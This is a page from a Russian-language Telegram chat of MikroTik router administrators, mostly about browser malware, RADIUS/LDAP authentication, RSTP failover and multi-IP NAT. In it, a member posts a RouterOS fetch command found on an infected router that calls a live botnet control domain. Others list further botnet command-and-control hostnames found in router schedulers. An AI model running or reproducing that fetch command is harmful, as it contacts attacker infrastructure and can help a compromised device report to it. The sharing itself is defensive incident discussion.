@MikrotikRu

Страница 3682 из 3964
Dmitrii
20.09.2018
11:32:13
во первых в брузере есть антифишинг

во вторых у тебя всплывет акно о загрузке

Evgeniy
20.09.2018
11:32:27
я на кртинке вижу уведомлние антвивиря про файл заставки и какой-то тиковый скрипт. связь между ними какая-то есть?

Dmitrii
20.09.2018
11:32:39
максимум может в кэш положить

Google
Dmitrii
20.09.2018
11:32:53
но кому он там всрался без запуска

Kirya
20.09.2018
11:32:59
выше

Dmitrii
20.09.2018
11:33:23
загрузки

ну и чего

Dmitrii
20.09.2018
11:34:29
защиты от дауна пока не изобрели ты из без микротика можешь потыкать на суперпрограмма для увелечения члена за 5 минут

с таким же успехом

Evgeniy
20.09.2018
11:35:23
скорее всего
т.е. нет уверенности?

Kirya
20.09.2018
11:35:26
да, ток на главной странице поп сайтов, ты таких суперувеличалок не встретишь

Google
Kirya
20.09.2018
11:35:52
т.е. нет уверенности?
нет, т.к. не ловил, но примерно можно догадаться, что этот скрипт может сделать

Dmitrii
20.09.2018
11:36:38
правда а откуда же я о них знаю? -)

Kirya
20.09.2018
11:37:21
правда а откуда же я о них знаю? -)
меньше в браззерз надо залепать ))

Dmitrii
20.09.2018
11:40:01
так оно обычно и бывает, я чего то нажал\а чето установилось\обновилось

и начал сыпать мусором браузер

но сначало то нужно тыкнуть

чистая соц инженерия

никкаих взломов

Kirya
20.09.2018
11:41:39
так смысл вируса в том, что даже тыкать не надо, идеш на попсовый сайт и автоматом чета качается, хомяк думает че за херь, нук запущу

Dmitrii
20.09.2018
11:41:46
как в л7 запретили качать ехе архивы и яваскрипт там сразу увеличители исчезли

дай мне такой сайт

если еще запретить даблклик так воообще антивирусы удалять можно

Kirya
20.09.2018
11:43:13
причем тут дабл клик, госпади, объясните ему, у мя не получается

Dmitrii
20.09.2018
11:45:28
да

потому надежнее запретить даблклик

-)

ну криптовымогатели можно просто политикой зарезать

Рамиль М.
20.09.2018
12:02:40
во ещё для изучения: {/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bc24d5c0d21bf27&action=upload&sncode=EBD4E1782A14856537C082686E2020B2&dynamic=static") keep-result=no} домен рабочий

Google
Vitaliy
20.09.2018
12:04:34
Ожидаемо появились, там же протокол изменился
мда уж... совсем это неприкольно... и шо теперь делать с этим, как жить то... схема freeradius+ldap+mschap по хорошему работать не будет... не хранить же пароли в cleartext...

Ilya
20.09.2018
12:04:38
вот это босс-ип встречал

курлом скачать не получилось, насколько я помню

Андрей
20.09.2018
12:05:45
Всем привет. Вопрос: Mesh wireless можно использовать для бесшовного роуминга?

Vladimir
20.09.2018
12:06:18
мда уж... совсем это неприкольно... и шо теперь делать с этим, как жить то... схема freeradius+ldap+mschap по хорошему работать не будет... не хранить же пароли в cleartext...
у меня как раз в таком виде на такой связке и заработало. А до этого логин в винбоксе только при условии включения обратимого шифрования заводился

Рамиль М.
20.09.2018
12:06:46
Vitaliy
20.09.2018
12:07:21
у меня как раз в таком виде на такой связке и заработало. А до этого логин в винбоксе только при условии включения обратимого шифрования заводился
в каком виде пароли хранятся в ldap? если в cleartext либо nt тогда должно заработать, если хешированные - тогда не будет

Dmitrii
20.09.2018
12:12:11
слушайте а кто из вас в тсп разбирается?

jabberd
20.09.2018
12:12:39
Строчки от двух разных ботнетов. Конкуренция =)

Dmitrii
20.09.2018
12:13:00
cubic rto:8000 mss:524 cwnd:1 ssthresh:7 unacked:1 retrans:1/3 lost:1

че эт значит?

Рамиль М.
20.09.2018
12:13:22
Строчки от двух разных ботнетов. Конкуренция =)
да, ещё один нашёл в шедулере: что-то там .bike.net

Dmitrii
20.09.2018
12:13:38
cubic wscale:7,7 rto:432 rtt:228.387/0.147 ato:40 mss:1366 ssthresh:2 send 95.7Kbps retrans:0/8 rcv_rtt:240 rcv_space:29200

это сильно плохо?

Vladimir
20.09.2018
12:14:31
в каком виде пароли хранятся в ldap? если в cleartext либо nt тогда должно заработать, если хешированные - тогда не будет
да, у меня вот так радиус делает /usr/bin/ntlm_auth --request-nt-key а самба уже в лдап запрашивает

jabberd
20.09.2018
12:15:19
да, ещё один нашёл в шедулере: что-то там .bike.net
такой я не встречал, а вот от старого аж коллекция адресов: bampombam.bpb.cbes.net createpage.myserv.ignorelist.com trompadiom.tutotame.bigbox.info

такой я не встречал, а вот от старого аж коллекция адресов: bampombam.bpb.cbes.net createpage.myserv.ignorelist.com trompadiom.tutotame.bigbox.info
Кстати, последний из них раньше вёл в Болгарию, а сейчас — в Южную Корею.

Ettercap
20.09.2018
12:34:24


antb0tk
20.09.2018
12:35:22
Через 10 минут после загрузки с интервалом в 60 секунд

Google
Ettercap
20.09.2018
12:37:20
Раньше Ping Timeout отсутствовал. Какой интервал тогда был?

antb0tk
20.09.2018
12:37:44
Оу, сорри, думал там Ping Interval. По ходу ответ ждет до 60 секунд (что не очень-то логично)

Andrey
20.09.2018
12:40:13
Есть хитровыдуманная задача - 2 микротика в сети провайдера в одном vlan. У провайдера подвисают свичи в одной из точек. (Провайдера не сменить, свичи не поменять, примем это как условия). Нужно обеспечить доступность микротика за зависшим свичом по тому же адресу, что он был доступен и через провайдера. Накрутил эту схемку, допустим я делаю L2 vpn, объединяю входящие порты от провайдера в бридж с этим туннелем, запускаю RSTP. Как быстро свичи провайдера узнают о том, что маки поменялись? На какое время сходимости RSTP можно рассчитывать?



синее - моё, красное - выпадающий свич провайдера, какая там на самом деле топология - хз

fluid
20.09.2018
12:41:42
пытаюсь сбросить hex r3, выключаю, зажимаю резет, подаю питание, начинает гореть юзр, потом он мигает, потом он горит, а потом я перестаю жать резет, но он не сбрасывает, что я делаю не так?

Admin
ERROR: S client not available

Рамиль М.
20.09.2018
12:44:52
господа, а чем разрулить 3 айпишника от одного прова в одном кабеле?

Vladimir
20.09.2018
12:45:04
на интерфейс сколько хочется можно вешать адресов

Рамиль М.
20.09.2018
12:45:39
куда разрулить? )
на разные айпи стучатся по разным портам

на интерфейс сколько хочется можно вешать адресов
а оно корректно работать то будет?

Andrey
20.09.2018
12:45:59
какие маки поменяются?
вот роутер 10.0.0.3, он включен в свич провайдера. Через lte модем поднят l2 туннель до другого роутера, который тоже включен в свич провайдера, оба этих порта в одном vlan. Вот когда вырубается свич красный, нужно чтобы роутер 10.0.0.3 продолжил работать, имея тот же ip, но чтобы трафик сначала шел через туннель до второго микрота, и выходил к провайдеру через порт того микротика

Vladimir
20.09.2018
12:46:11
а оно корректно работать то будет?
а чего ему сделается. Ну только имейте ввиду, что маскарадинг выбирает первый адрес по порядку например.

Andrey
20.09.2018
12:46:36
соответственно сначала мак был за красным роутером, а станет за другим, насколько это быстро отработает?

Рамиль М.
20.09.2018
12:47:33
Google
Vladimir
20.09.2018
12:48:35
соответственно сначала мак был за красным роутером, а станет за другим, насколько это быстро отработает?
мгновенно это отработает. Если сделать так - тоннель от Роутрер10.0.0.2 до Роутер10.0.0.3, этот тоннель в бридж на обоих роутерах с тем интерфейсом, который "основной", и у этого тоннеля на обоих сторона Root Path Cost сделать повыше

Рамиль М.
20.09.2018
12:49:11
А что ты хочешь делать с 3мя ip? Есть vrf, routing-mark, pref-source...
чтобы пользователи ходили в инет с конкретного белого айпи

Vladimir
20.09.2018
12:49:37
а как загнать всех пользователей в инет через один айпи?
эм. Ну вместо маскарада используете нат, да и все

Andrey
20.09.2018
12:49:40
Чувак, не используй L2 туннели поверх PPP. Тебе нужен OSPF+BFD и без RSTP
провайдер просто отдаёт мне vlan на разных объектах, и не будет настраивать ospf cо своей стороны

Рамиль М.
20.09.2018
12:50:05
А остальные-то два куда?
для подключения через dst-nat

Aleksey
20.09.2018
12:50:28
Andrey
20.09.2018
12:50:29
А ему и не надо) У тебя ж 3 микротика под рукой
два, один за отваливающимся свичом, второй за стабильным

antb0tk
20.09.2018
12:50:43
а 10.0.0.1 чей?

Andrey
20.09.2018
12:50:51
шлюз провайдера

antb0tk
20.09.2018
12:51:22
погоди, а ты откуда обращаешься?

Vladimir
20.09.2018
12:51:36
там пунктиром нарисовано

Andrey
20.09.2018
12:52:06
моё - только синее

тоесть как мне видится, мне нужно добавить по бриджу и запустить на них rstp, чтобы вышла типа петля через VPN туннель

Andrey
20.09.2018
12:54:31
как сделать на l3 маршрутизации - хз, нужно чтобы внешний адрес оставался доступен

antb0tk
20.09.2018
12:55:14
ну тебе ничего не мешает на бриджах и ospf поднять, анонсить будешь по /32.

Vladimir
20.09.2018
12:55:21
тоесть как мне видится, мне нужно добавить по бриджу и запустить на них rstp, чтобы вышла типа петля через VPN туннель
ну только у второго l2 стоимость должна быть выше, тогда петли не будет, и будет работать, как вам хочется

но eoip через радио удовольствие существенно ниже среднего, имейте ввиду

Страница 3682 из 3964